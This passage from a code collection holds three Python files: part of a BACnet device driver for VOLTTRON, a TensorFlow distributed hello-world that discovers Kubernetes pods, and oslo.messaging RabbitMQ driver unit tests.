this_device = LocalDeviceObject(
objectName=obj_name,
objectIdentifier=obj_id,
maxApduLengthAccepted=max_apdu_len,
segmentationSupported=seg_supported,
vendorIdentifier=ven_id,
)
# build a bit string that knows about the bit names and leave it empty. We respond to NOTHING.
pss = ServicesSupported()
# set the property value to be just the bits
this_device.protocolServicesSupported = pss.value
this_application = BACnet_application(this_device, address)
#We must use traditional python threads, otherwise the driver will
# hang during startup while trying to scrape actuator values.
# I think this is because the reactor hasn't started before we start trying
# to use the other threads.
#reactor.callInThread(bacpypes.core.run)
#reactor.addSystemEventTrigger("before", "shutdown", bacpypes.core.stop)
server_thread = threading.Thread(target=bacpypes.core.run)
# exit the BACnet App thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
#Mostly for testing by hand and initializing actuators.
def get_point_sync(self, point_name):
register = self.point_map[point_name]
return register.get_state_sync(this_application, self.target_address)
#Mostly for testing by hand.
def set_point_sync(self, point_name, value):
register = self.point_map[point_name]
return register.set_state_sync(this_application, self.target_address, value)
#Getting data in a async manner
def get_point_async(self, point_name):
register = self.point_map[point_name]
return register.get_state_async(this_application, self.target_address)
#setting data in a async manner
def set_point_async(self, point_name, value):
register = self.point_map[point_name]
return register.set_state_async(this_application, self.target_address, value)
def scrape_all_callback(self, result):
result_dict={}
for prop_tuple, value in result.iteritems():
name = self.reverse_point_map[prop_tuple]
result_dict[name] = value
return result_dict
def scrape_all(self):
read_access_spec_list = []
for obj_data, properties in self.object_property_map.iteritems():
obj_type, obj_inst = obj_data
prop_ref_list = []
for prop in properties:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = self.target_address
iocb = IOCB(request)
this_application.submit_request(iocb)
iocb.ioDefered.addCallback(self.scrape_all_callback)
return iocb.ioDefered
def parse_config(self, config_file):
if config_file is None:
return
with open(config_file, 'rb') as f:
configDict = DictReader(f)
for regDef in configDict:
#Skip lines that have no address yet.
if not regDef['Point Name']:
continue
io_type = regDef['BACnet Object Type']
read_only = regDef['Writable'].lower() != 'true'
point_name = regDef['Volttron Point Name']
index = int(regDef['Index'])
description = regDef['Notes']
units = regDef['Units']
property_name = regDef['Property']
register = BACnetRegister(index,
io_type,
property_name,
read_only,
point_name,
units,
description = description)
self.insert_register(register)
class BACnet(BaseSmapVolttron):
def setup(self, opts):
self.set_metadata('/', {'Extra/Driver' : 'volttron.drivers.bacnet.BACnet'})
super(BACnet, self).setup(opts)
def get_interface(self, opts):
target_ip_address = opts['ip_address']
bacnet_config_file = opts['bacnet_device_config']
config = opts.get('register_config', configFile)
bacnet_config = ConfigParser()
bacnet_config.read(bacnet_config_file)
# check for BACpypes section
if not bacnet_config.has_section('BACpypes'):
raise RuntimeError("INI file with BACpypes section required")
ini_obj = dict(bacnet_config.items('BACpypes'))
self_ip_address = ini_obj['address']
max_apdu_len = int(ini_obj.get('max_apdu_length', 1024))
seg_supported = ini_obj.get('segmented_supported', 'segmentedBoth')
obj_id = int(ini_obj.get('object_id', 599))
obj_name = ini_obj.get('object_name', 'sMap BACnet driver')
ven_id = int(ini_obj.get('vendor_id', 15))
return BACnetInterface(self_ip_address, target_ip_address,
max_apdu_len=max_apdu_len, seg_supported=seg_supported,
obj_id=obj_id, obj_name=obj_name,
ven_id=ven_id,
config_file=config)
if __name__ == "__main__":
from pprint import pprint
from time import sleep
import sys
iface = BACnetInterface(sys.argv[1], sys.argv[2], config_file='test2.csv')
def run_tests():
print 'Test'
r = iface.get_point_sync('RoomRealTemp2')
print 'RoomRealTemp2', r
r = iface.get_point_sync('RoomRealTemp1')
print 'RoomRealTemp1', r
r = iface.get_point_sync('OutsideAir')
print 'OutsideAir', r
r = iface.get_point_sync('Current1')
print 'Current1', r
r = iface.get_point_sync('Occupied')
print 'Occupied', r
r = iface.get_point_sync('Volt1')
print 'Volt1', r
new_value = 55.0 if r != 55.0 else 65.0
print 'Writing to Volt1:', new_value
r = iface.set_point_sync('Volt1', new_value)
print 'Volt1 change result', r
#For some reason on the test device if we try to read what
# we just wrote too quickly we'll get back the old value.
sleep(1)
r = iface.get_point_sync('Volt1')
print 'Volt1', r
def printvalue(value, name):
print name,':'
pprint(value)
d = iface.get_point_async('ProgrammingAnalogVariable1')
d.addCallback(printvalue, 'ProgrammingAnalogVariable1')
d = iface.get_point_async('Cool1')
d.addCallback(printvalue, 'Cool1')
d = iface.scrape_all()
d.addCallback(printvalue, 'all')
def end():
reactor.stop()
reactor.callLater(2, end)
reactor.callLater(0, run_tests)
reactor.run()
|
distributed-helloworld.py
|
import sys
import os
import math
import tensorflow as tf
from kubernetes import client, config
import socket
import fcntl
import struct
import time
import threading
# these globals are used to bootstrap the TF cluster
myindex = -99
ps_hosts = []
worker_hosts = []
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def startup():
global ps_hosts
global worker_hosts
global myindex
# The ip address of the pod is used to determine the index of
# the pod in the ClusterSpec.
myip = get_ip_address('eth0')
# Get the namespace from the service account
with open ("/run/secrets/kubernetes.io/serviceaccount/namespace", "r") as nsfile:
namespace = nsfile.readline()
# Get a list of pods that are part of this job
# Since all pods may not be ready yet. The code will sleep and loop
# until all pod IPs are available.
config.load_incluster_config()
ready = False
while not ready:
ready = True
allpods = []
v1 = client.CoreV1Api()
podlist = v1.list_namespaced_pod(namespace, label_selector="lsf.ibm.com/jobId="+os.environ["LSB_JOBID"])
for pod in podlist.items:
if pod.status.pod_ip == None:
ready = False
time.sleep(1)
continue
else:
allpods.append(pod.status.pod_ip)
# Now that the pod list is complete. Get ready for cluster spec generation
# by sorting the pod list by IP address.
allpods = sorted(allpods, key=lambda ip: socket.inet_aton(ip))
print "allpods " + str(allpods)
# Build the cluster configuration.
# Keep track of which index in the cluster spec
# corresponds to me.
ix = 0
for pod in allpods:
ps_hosts.append(pod + ":2221")
worker_hosts.append(pod + ":2222")
if pod == myip:
myindex = ix
ix = ix + 1
print "startup done. myindex: "+str(myindex)+", ps_hosts: "+str(ps_hosts)+", worker_hosts: "+str(worker_hosts)
def run_ps():
global ps_hosts
global worker_hosts
global myindex
print "ps_hosts: "+str(ps_hosts)+", myindex: "+str(myindex)
cluster = tf.train.ClusterSpec({"ps": ps_hosts, "worker": worker_hosts})
server = tf.train.Server(cluster,
job_name="ps",
task_index=myindex)
# to enable the parameter server to exit gracefully, make some queues that
# workers can write to, to indicate that they are done. when a parameter
# server sees that all workers are done, then it will exit.
with tf.device('/job:ps/task:%d' % myindex):
queue = tf.FIFOQueue(cluster.num_tasks('worker'), tf.int32, shared_name='done_queue%d' % myindex)
# wait for the queue to be filled
with tf.Session(server.target) as sess:
for i in range(cluster.num_tasks('worker')):
sess.run(queue.dequeue())
print('ps:%d received "done" from worker:%d' % (myindex, i))
print('ps:%d quitting' % myindex)
def run_worker():
global ps_hosts
global worker_hosts
global myindex
cluster = tf.train.ClusterSpec({"ps": ps_hosts, "worker": worker_hosts})
server = tf.train.Server(cluster,
job_name="worker",
task_index=myindex)
# Assigns ops to the local worker by default.
with tf.device(tf.train.replica_device_setter(
worker_device="/job:worker/task:%s" % myindex,
cluster=cluster)):
# set up some queue to notify the ps tasks when it time to exit
stop_queues = []
# create a shared queue on the worker which is visible on /job:ps/task:%d
for i in range(cluster.num_tasks('ps')):
with tf.device('/job:ps/task:%d' % i):
stop_queues.append(tf.FIFOQueue(cluster.num_tasks('worker'), tf.int32, shared_name='done_queue%d' % i).enqueue(1))
# Create a "supervisor", which oversees the training process.
sv = tf.train.Supervisor(is_chief=(myindex==0))
# The supervisor takes care of session initialization, restoring from
# a checkpoint, and closing when done or an error occurs.
with sv.managed_session(server.target) as sess:
print "*********************"
print "Hello from worker %d!" % myindex
print "*********************"
# notify the parameter servers that its time to exit.
for op in stop_queues:
sess.run(op)
# Ask for all the services to stop.
sv.stop()
if __name__ == "__main__":
# Each pod is both a parameter server and a worker
# Each runs in a different thread.
startup()
threads = [
threading.Thread(target=run_ps),
threading.Thread(target=run_worker)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test_impl_rabbit.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import ssl
import sys
import threading
import time
import uuid
import fixtures
import kombu
import kombu.transport.memory
from oslo_serialization import jsonutils
import testscenarios
import oslo_messaging
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import common as driver_common
from oslo_messaging._drivers import impl_rabbit as rabbit_driver
from oslo_messaging.exceptions import MessageDeliveryFailure
from oslo_messaging.tests import utils as test_utils
from six.moves import mock
load_tests = testscenarios.load_tests_apply_scenarios
class TestHeartbeat(test_utils.BaseTestCase):
@mock.patch('oslo_messaging._drivers.impl_rabbit.LOG')
@mock.patch('kombu.connection.Connection.heartbeat_check')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'_heartbeat_supported_and_enabled', return_value=True)
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'ensure_connection')
def _do_test_heartbeat_sent(self, fake_ensure_connection,
fake_heartbeat_support, fake_heartbeat,
fake_logger, heartbeat_side_effect=None,
info=None):
event = threading.Event()
def heartbeat_check(rate=2):
event.set()
if heartbeat_side_effect:
raise heartbeat_side_effect
fake_heartbeat.side_effect = heartbeat_check
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
conn = transport._driver._get_connection()
conn.ensure(method=lambda: True)
event.wait()
conn._heartbeat_stop()
# check heartbeat have been called
self.assertLess(0, fake_heartbeat.call_count)
if not heartbeat_side_effect:
self.assertEqual(1, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(0, fake_logger.info.call_count)
else:
self.assertEqual(2, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(1, fake_logger.info.call_count)
self.assertIn(mock.call(info, mock.ANY),
fake_logger.info.mock_calls)
def test_test_heartbeat_sent_default(self):
self._do_test_heartbeat_sent()
def test_test_heartbeat_sent_connection_fail(self):
self._do_test_heartbeat_sent(
heartbeat_side_effect=kombu.exceptions.OperationalError,
info='A recoverable connection/channel error occurred, '
'trying to reconnect: %s')
class TestRabbitQos(test_utils.BaseTestCase):
def connection_with(self, prefetch, purpose):
self.config(rabbit_qos_prefetch_count=prefetch,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
transport._driver._get_connection(purpose)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_sent_on_listen_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_called_once_with(0, 1, False)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_when_cfg_zero(self, fake_basic_qos):
self.connection_with(prefetch=0, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_not_called()
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_on_send_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_SEND)
fake_basic_qos.assert_not_called()
class TestRabbitDriverLoad(test_utils.BaseTestCase):
scenarios = [
('rabbit', dict(transport_url='rabbit:/guest:guest@localhost:5672//')),
('kombu', dict(transport_url='kombu:/guest:guest@localhost:5672//')),
('rabbit+memory', dict(transport_url='kombu+memory:/'))
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_driver_load(self, fake_ensure, fake_reset):
self.config(heartbeat_timeout_threshold=60,
group='oslo_messaging_rabbit')
self.messaging_conf.transport_url = self.transport_url
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
class TestRabbitDriverLoadSSL(test_utils.BaseTestCase):
scenarios = [
('no_ssl', dict(options=dict(), expected=False)),
('no_ssl_with_options', dict(options=dict(ssl_version='TLSv1'),
expected=False)),
('just_ssl', dict(options=dict(ssl=True),
expected=True)),
('ssl_with_options', dict(options=dict(ssl=True,
ssl_version='TLSv1',
ssl_key_file='foo',
ssl_cert_file='bar',
ssl_ca_file='foobar'),
expected=dict(ssl_version=3,
keyfile='foo',
certfile='bar',
ca_certs='foobar',
cert_reqs=ssl.CERT_REQUIRED))),
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('kombu.connection.Connection')
def test_driver_load(self, connection_klass, fake_ensure):
self.config(group="oslo_messaging_rabbit", **self.options)
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
connection = transport._driver._get_connection()
connection_klass.assert_called_once_with(
'memory:///', transport_options={
'client_properties': {
'capabilities': {
'connection.blocked': True,
'consumer_cancel_notify': True,
'authentication_failure_close': True,
},
'connection_name': connection.name},
'confirm_publish': True,
'on_blocked': mock.ANY,
'on_unblocked': mock.ANY},
ssl=self.expected, login_method='AMQPLAIN',
heartbeat=60, failover_strategy='round-robin'
)
class TestRabbitPublisher(test_utils.BaseTestCase):
@mock.patch('kombu.messaging.Producer.publish')
def test_send_with_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key',
timeout=1)
fake_publish.assert_called_with(
'msg', expiration=1,
exchange=exchange_mock,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
routing_key='routing_key')
@mock.patch('kombu.messaging.Producer.publish')
def test_send_no_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key')
fake_publish.assert_called_with(
'msg', expiration=None,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
exchange=exchange_mock,
routing_key='routing_key')
def test_declared_queue_publisher(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
e_passive = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=True)
e_active = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=False)
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
exc = conn.connection.channel_errors[0]
def try_send(exchange):
conn._ensure_publishing(
conn._publish_and_creates_default_queue,
exchange, {}, routing_key='foobar')
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange does not exists
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Create it
try_send(e_active)
# Ensure it creates it
try_send(e_passive)
with mock.patch('kombu.messaging.Producer.publish',
side_effect=exc):
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange is already in cache
self.assertIn('foobar', conn._declared_exchanges)
# Reset connection
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Ensure the cache is empty
self.assertEqual(0, len(conn._declared_exchanges))
try_send(e_active)
self.assertIn('foobar', conn._declared_exchanges)
def test_send_exception_remap(self):
bad_exc = Exception("Non-oslo.messaging exception")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
with mock.patch('kombu.messaging.Producer.publish',
side_effect=bad_exc):
self.assertRaises(MessageDeliveryFailure,
conn._ensure_publishing,
conn._publish, exchange_mock, 'msg')
class TestRabbitConsume(test_utils.BaseTestCase):
def test_consume_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
deadline = time.time() + 6
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
# kombu memory transport doesn't really raise error
# so just simulate a real driver behavior
conn.connection.connection.recoverable_channel_errors = (IOError,)
conn.declare_fanout_consumer("notif.info", lambda msg: True)
with mock.patch('kombu.connection.Connection.drain_events',
side_effect=IOError):
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
self.assertEqual(0, int(deadline - time.time()))
def test_consume_from_missing_queue(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
conn.connection.connection.recoverable_connection_errors = ()
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
# Ensure that a queue will be re-declared if the consume method
# of kombu.Queue raise amqp.NotFound
conn.consume()
self.assertEqual(2, declare.call_count)
def test_consume_from_missing_queue_with_io_error_on_redeclaration(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
declare.side_effect = [IOError, None]
conn.connection.connection.recoverable_connection_errors = (
IOError,)
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
# Ensure that a queue will be re-declared after
# 'queue not found' exception despite on connection error.
conn.consume()
self.assertEqual(3, declare.call_count)
def test_connection_ack_have_disconnected_kombu_connection(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
channel = conn.connection.channel
with mock.patch('kombu.connection.Connection.connected',
new_callable=mock.PropertyMock,
return_value=False):
self.assertRaises(driver_common.Timeout,
conn.connection.consume, timeout=0.01)
# Ensure a new channel have been setuped
self.assertNotEqual(channel, conn.connection.channel)
class TestRabbitTransportURL(test_utils.BaseTestCase):
scenarios = [
('none', dict(url=None,
expected=["amqp://guest:guest@localhost:5672/"])),
('memory', dict(url='kombu+memory:////',
expected=["memory:///"])),
('empty',
dict(url='rabbit:///',
expected=['amqp://guest:guest@localhost:5672/'])),
('localhost',
dict(url='rabbit://localhost/',
expected=['amqp://:@localhost:5672/'])),
('virtual_host',
dict(url='rabbit:///vhost',
expected=['amqp://guest:guest@localhost:5672/vhost'])),
('no_creds',
dict(url='rabbit://host/virtual_host',
expected=['amqp://:@host:5672/virtual_host'])),
('no_port',
dict(url='rabbit://user:password@host/virtual_host',
expected=['amqp://user:password@host:5672/virtual_host'])),
('full_url',
dict(url='rabbit://user:password@host:10/virtual_host',
expected=['amqp://user:password@host:10/virtual_host'])),
('full_two_url',
dict(url='rabbit://user:password@host:10,'
'user2:password2@host2:12/virtual_host',
expected=["amqp://user:password@host:10/virtual_host",
"amqp://user2:password2@host2:12/virtual_host"]
)),
('rabbit_ipv6',
dict(url='rabbit://u:p@[fd00:beef:dead:55::133]:10/vhost',
expected=['amqp://u:p@[fd00:beef:dead:55::133]:10/vhost'])),
('rabbit_ipv4',
dict(url='rabbit://user:password@10.20.30.40:10/vhost',
expected=['amqp://user:password@10.20.30.40:10/vhost'])),
]
def setUp(self):
super(TestRabbitTransportURL, self).setUp()
self.messaging_conf.transport_url = 'rabbit:/'
self.config(heartbeat_timeout_threshold=0,
group='oslo_messaging_rabbit')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_transport_url(self, fake_reset, fake_ensure):
transport = oslo_messaging.get_transport(self.conf, self.url)
self.addCleanup(transport.cleanup)
driver = transport._driver
urls = driver._get_connection()._url.split(";")
self.assertEqual(sorted(self.expected), sorted(urls))
class TestSendReceive(test_utils.BaseTestCase):
_n_senders = [
('single_sender', dict(n_senders=1)),
('multiple_senders', dict(n_senders=10)),
]
_context = [
('empty_context', dict(ctxt={})),
('with_context', dict(ctxt={'user': 'mark'})),
]
_reply = [
('rx_id', dict(rx_id=True, reply=None)),
('none', dict(rx_id=False, reply=None)),
('empty_list', dict(rx_id=False, reply=[])),
('empty_dict', dict(rx_id=False, reply={})),
('false', dict(rx_id=False, reply=False)),
('zero', dict(rx_id=False, reply=0)),
]
_failure = [
('success', dict(failure=False)),
('failure', dict(failure=True, expected=False)),
('expected_failure', dict(failure=True, expected=True)),
]
_timeout = [
('no_timeout', dict(timeout=None, call_monitor_timeout=None)),
('timeout', dict(timeout=0.01, # FIXME(markmc): timeout=0 is broken?
call_monitor_timeout=None)),
('call_monitor_timeout', dict(timeout=0.01,
call_monitor_timeout=0.02)),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._n_senders,
cls._context,
cls._reply,
cls._failure,
cls._timeout)
def test_send_receive(self):
self.config(kombu_missing_consumer_retry_timeout=0.5,
group="oslo_messaging_rabbit")
self.config(heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
# FIXME(danms): Surely this is not the right way to do this...
self.ctxt['client_timeout'] = self.call_monitor_timeout
def send_and_wait_for_reply(i):
try:
timeout = self.timeout
cm_timeout = self.call_monitor_timeout
replies.append(driver.send(target,
self.ctxt,
{'tx_id': i},
wait_for_reply=True,
timeout=timeout,
call_monitor_timeout=cm_timeout))
self.assertFalse(self.failure)
self.assertIsNone(self.timeout)
except (ZeroDivisionError, oslo_messaging.MessagingTimeout) as e:
replies.append(e)
self.assertTrue(self.failure or self.timeout is not None)
while len(senders) < self.n_senders:
senders.append(threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), )))
for i in range(len(senders)):
senders[i].start()
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.ctxt, received.ctxt)
self.assertEqual({'tx_id': i}, received.message)
msgs.append(received)
# reply in reverse, except reply to the first guy second from last
order = list(range(len(senders) - 1, -1, -1))
if len(order) > 1:
order[-1], order[-2] = order[-2], order[-1]
for i in order:
if self.timeout is None:
if self.failure:
try:
raise ZeroDivisionError
except Exception:
failure = sys.exc_info()
msgs[i].reply(failure=failure)
elif self.rx_id:
msgs[i].reply({'rx_id': i})
else:
msgs[i].reply(self.reply)
senders[i].join()
self.assertEqual(len(senders), len(replies))
for i, reply in enumerate(replies):
if self.timeout is not None:
self.assertIsInstance(reply, oslo_messaging.MessagingTimeout)
elif self.failure:
self.assertIsInstance(reply, ZeroDivisionError)
elif self.rx_id:
self.assertEqual({'rx_id': order[i]}, reply)
else:
self.assertEqual(self.reply, reply)
TestSendReceive.generate_scenarios()
class TestPollAsync(test_utils.BaseTestCase):
def test_poll_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
received = listener.poll(timeout=0.050)
self.assertEqual([], received)
class TestRacyWaitForReply(test_utils.BaseTestCase):
def test_send_receive(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
wait_conditions = []
orig_reply_waiter = amqpdriver.ReplyWaiter.wait
def reply_waiter(self, msg_id, timeout, call_monitor_timeout):
if wait_conditions:
cond = wait_conditions.pop()
with cond:
cond.notify()
with cond:
cond.wait()
return orig_reply_waiter(self, msg_id, timeout,
call_monitor_timeout)
self.useFixture(fixtures.MockPatchObject(
amqpdriver.ReplyWaiter, 'wait', reply_waiter))
def send_and_wait_for_reply(i, wait_for_reply):
replies.append(driver.send(target,
{},
{'tx_id': i},
wait_for_reply=wait_for_reply,
timeout=None))
while len(senders) < 2:
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), True))
t.daemon = True
senders.append(t)
# test the case then msg_id is not set
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), False))
t.daemon = True
senders.append(t)
# Start the first guy, receive his message, but delay his polling
notify_condition = threading.Condition()
wait_conditions.append(notify_condition)
with notify_condition:
senders[0].start()
notify_condition.wait()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 0}, msgs[-1].message)
# Start the second guy, receive his message
senders[1].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 1}, msgs[-1].message)
# Reply to both in order, making the second thread queue
# the reply meant for the first thread
msgs[0].reply({'rx_id': 0})
msgs[1].reply({'rx_id': 1})
# Wait for the second thread to finish
senders[1].join()
# Start the 3rd guy, receive his message
senders[2].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 2}, msgs[-1].message)
# Verify the _send_reply was not invoked by driver:
with mock.patch.object(msgs[2], '_send_reply') as method:
msgs[2].reply({'rx_id': 2})
self.assertEqual(0, method.call_count)
# Wait for the 3rd thread to finish
senders[2].join()
# Let the first thread continue
with notify_condition:
notify_condition.notify()
# Wait for the first thread to finish
senders[0].join()
# Verify replies were received out of order
self.assertEqual(len(senders), len(replies))
self.assertEqual({'rx_id': 1}, replies[0])
self.assertIsNone(replies[1])
self.assertEqual({'rx_id': 0}, replies[2])
def _declare_queue(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
queue = kombu.entity.Queue(name=target.topic + '_fanout_12345',
channel=channel,
exchange=exchange,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
queue = kombu.entity.Queue(name=topic,
channel=channel,
exchange=exchange,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
queue = kombu.entity.Queue(name=target.topic,
channel=channel,
exchange=exchange,
routing_key=target.topic)
queue.declare()
return connection, channel, queue
class TestRequestWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': datetime.datetime(1920, 2, 3, 4, 5, 6, 7)}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'user': 'mark', 'project': 'snarkybunch'},
expected_ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def setUp(self):
super(TestRequestWireFormat, self).setUp()
self.uuids = []
self.orig_uuid4 = uuid.uuid4
self.useFixture(fixtures.MonkeyPatch('uuid.uuid4', self.mock_uuid4))
def mock_uuid4(self):
self.uuids.append(self.orig_uuid4())
return self.uuids[-1]
def test_request_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
connection, channel, queue = _declare_queue(target)
self.addCleanup(connection.release)
driver.send(target, self.ctxt, self.msg)
msgs = []
def callback(msg):
msg = channel.message_to_python(msg)
msg.ack()
msgs.append(msg.payload)
queue.consume(callback=callback,
consumer_tag='1',
nowait=False)
connection.drain_events()
self.assertEqual(1, len(msgs))
self.assertIn('oslo.message', msgs[0])
received = msgs[0]
received['oslo.message'] = jsonutils.loads(received['oslo.message'])
# FIXME(markmc): add _msg_id and _reply_q check
expected_msg = {
'_unique_id': self.uuids[0].hex,
}
expected_msg.update(self.expected)
expected_msg.update(self.expected_ctxt)
